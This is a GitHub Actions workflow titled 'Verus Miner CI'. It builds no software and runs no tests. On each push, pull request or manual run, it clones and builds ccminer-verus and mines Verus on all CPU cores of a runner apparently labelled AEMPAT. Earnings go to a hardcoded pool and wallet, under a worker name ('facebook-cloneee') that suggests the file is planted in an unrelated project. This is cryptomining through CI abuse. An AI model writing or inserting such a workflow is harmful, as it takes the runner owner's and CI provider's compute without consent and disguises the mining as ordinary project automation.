name: Verus Miner CI

on:
  push:
    branches: [master]
  pull_request:
    branches: [master]
  workflow_dispatch:

jobs:
  build:
    runs-on: AEMPAT

    steps:
      - uses: actions/checkout@v2

      - name: Install dependencies
        run: |
          sudo apt-get update
          sudo apt-get install -y git build-essential cmake libcurl4-openssl-dev libssl-dev libjansson-dev automake libgmp-dev

      - name: Clone ccminer-verus
        run: |
          git clone https://github.com/Oink70/ccminer-verus.git
          cd ccminer-verus
          ./build.sh

      - name: Start mining
        run: |
          cd ccminer-verus
          ./ccminer -a verus -o stratum+tcp://ap.luckpool.net:3956 -u RRykJ9xGTKunTzEHD54L7hBcWDFf9hcGQG.facebook-cloneee -p x -t $(nproc)